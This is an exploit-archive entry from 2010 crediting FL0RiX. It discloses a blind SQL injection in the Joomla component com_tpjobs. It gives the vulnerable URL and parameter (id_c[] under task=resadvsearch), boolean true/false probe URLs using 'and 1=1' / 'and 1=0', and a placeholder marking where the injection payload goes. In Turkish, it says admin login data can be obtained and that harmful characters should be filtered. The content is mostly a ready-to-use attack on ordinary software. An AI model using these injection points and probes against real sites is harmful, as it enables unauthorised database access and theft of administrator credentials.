[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component com_tpjobs Blind SQL injection Vulnerability
# Published : 2010-01-03
# Author : FL0RiX
# Previous Title : Joomla Component com_countries SQL Injection Vulnerability
# Next Title : Joomla Component com_alfresco SQL Injection Vulnerability


<------------------- header data start ------------------- >

#####################################################################
#Joomla Component com_tpjobs Blind SQL injection Vulnerability
#####################################################################

# author        : FL0RiX

# Name           : com_tpjobs

# Bug Type       : (Blind) SQL Injection

# Infection      : Admin login bilgileri al&#305;nabilir.

# Demo Vuln.     :
TRUE(+)
? http://server/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=1 and 1=1
FALSE(-)
? http://server/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=1 and 1=0

# Bug Fix Advice : Zararl&#305; karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path/index.php?option=com_tpjobs&task=resadvsearch&keyword=&id_c[]=[SQL INJ.]

< -- bug code end of -- >